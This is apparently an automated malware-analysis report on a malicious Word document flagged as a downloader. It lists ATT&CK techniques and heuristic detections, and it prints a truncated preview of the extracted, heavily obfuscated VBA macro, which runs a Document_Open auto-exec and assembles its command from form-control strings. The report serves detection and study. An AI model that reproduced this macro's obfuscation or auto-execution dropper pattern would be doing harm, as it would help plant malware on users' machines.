MALICIOUS
322
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for initial execution. The macros use `CreateObject` and reassembled API names like 'winmgmts' to launch processes via WMI, indicating a downloader or dropper functionality. The presence of a ClamAV detection for 'Doc.Downloader.Generic' further supports this assessment.
Heuristics 8
-
ClamAV: Doc.Downloader.Generic-7444888-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7444888-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7696 bytes |
SHA-256: 555d97810ff18e263088ae8568876865e16110c96c67ae8906495c361146df45 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Wdzxfyoq"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Dhecbewtk, 0, 0, MSForms, TextBox"
Private Sub Document_open()
For Drwrylpvnmfv = Aqysmcnevkszq To 0
Xgcihxeyfyzcb = (13 - Atn(51) - (44 + Round(41) * Aedrnvzec / CInt(1)))
Select Case Zwmzyvzwq
Case Nmbwrttm
Voknvzbcxc = CLng(Ayhmgzec)
Bwrrpqdgkqhv = Oct(Bldvyttcd)
Case Dpfmtixgcn
Ejlyrrjsftzkv = Elzytefmb
Rhkobtopymnv = Int(29)
End Select
Next
For Vtcgzkmbgru = Orcxqzufzjd To 0
Rviucbwnjmzp = (13 - Atn(51) - (44 + Round(41) * Hwodmpzidyf / CInt(1)))
Select Case Lhvkzhdsqsmpt
Case Fediijnj
Rivirkokc = CLng(Nczhexrdb)
Iwdyvxipyyke = Oct(Ikyiyfqwxrcda)
Case Vgjsyazfsp
Nlhdysiv = Vciclylwrxdd
Amjyjfftidck = Int(29)
End Select
Next
For Dwcfeyhy = Bezymiwgxs To 0
Ngeddmtrbhg = (13 - Atn(51) - (44 + Round(41) * Vodihnqllbmn / CInt(1)))
Select Case Amcmdhnivabu
Case Pjtxufqus
Eeebespzste = CLng(Dxfmsdgmrlvc)
Szdguewydig = Oct(Luclkkzuw)
Case Bpscmsiz
Xapnkuxe = Fbuuspalrivwz
Elulkzhug = Int(29)
End Select
Next
Xtfakdhpq
End Sub
Attribute VB_Name = "Zgzonzzft"
Attribute VB_Base = "0{CE81A769-145F-443B-8E1F-0D5017540E62}{9D7B60EB-257F-451F-8DBF-E1BD439C4B8A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Tvngwwozfz"
Function Kdklpvzq()
For Ewuufquzapr = Msvikdnc To 0
Xwqdqtzx = (13 - Atn(51) - (44 + Round(41) * Llwlepanzsq / CInt(1)))
Select Case Tdukyqbrks
Case Yondfbriqrbvj
Cactmynwawja = CLng(Vascoganj)
Zqsccyauvyr = Oct(Hyksnhwbkburi)
Case Ytpricmiuuyx
Liestvqvi = Xpooxlug
Biayxuqpxokn = Int(29)
End Select
Next
Fqifrbpyjlsis = Wdzxfyoq.Dhecbewtk
For Ldcmwaxyk = Ujmlwuqo To 0
Spzcslljru = (13 - Atn(51) - (44 + Round(41) * Xgtckddbehft / CInt(1)))
Select Case Lwfxcsiwto
Case Eomoshscmg
Jnkjgkjggfzo = CLng(Rtjamezayppp)
Bsafelophzpjf = Oct(Yoxlypzs)
Case Nujovurvkfnf
Rfclkldzcw = Reqjbapl
Ealeynurptun = Int(29)
End Select
Next
Bjcluinwj = Fqifrbpyjlsis + Zgzonzzft.Xyrlviug + Zgzonzzft.Laxeemkffx + Zgzonzzft.Wfegvhtqdodyq
For Iqidbhmw = Vlsgmzoc To 0
Sndceibozfdx = (13 - Atn(51) - (44 + Round(41) * Jtfzlsvkzetm / CInt(1)))
Select Case Rpiyrxiu
Case Ytgyxazxj
Tuoqdyhozirya = CLng(Xfgeiogybr)
Nyfwdiexuthoy = Oct(Nyhugbndt)
Case Shmvnyrau
Moqvyodysfhj = Txfwzvmf
Wlygiwygpul = Int(29)
End Select
Next
Edlhicqhv = Bjcluinwj + Zgzonzzft.Sgpovdkwouyjy + Zgzonzzft.Ljjbswuhxdzup.ControlTipText
For Jjjnqyljxo = Srldhxsyw To 0
Vjqvxflljtvtv = (13 - Atn(51) - (44 + Round(41) * Sgixvtefc / CInt(1)))
Select Case Vkwixqqk
Case Zcodlcbl
Qkcelpyxeqeon = CLng(Bpawfdlfbs)
Ukrdtgjolhrw = Oct(Sfwylpwtjmao)
Case Eealhwennnli
Ytyepnkfi = Oxaaedeoo
Hfolmfsjn = Int(29)
End Select
Next
Kdklpvzq = Mljqcgfsu + Edlhicqhv + Mljqcgfsu
For Hcrtrtkcyi = Jbhtajkww To 0
Ahtjsqyf = (13 - Atn(51) - (44 + Round(41) * Kvbeodiwkz / CInt(1)))
Select Case Hjxtybsxo
Case Zqmyjslacqxy
Pmfbalndt = CLng(Lzrwnfvvab)
Fyeyzvqk = Oct(Mjonvodhvxmo)
Case Tdplbdefbkzc
Oidpztmiha = Rtgqpqalf
Eigmhhent = Int(29)
End Select
Next
End Function
Function Xtfakdhpq()
For Nskutxfxe = Zhsyhbdfwf To 0
Oshkochhw = (13 - Atn(51) - (44 + Round(41) * Uibzvyt
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.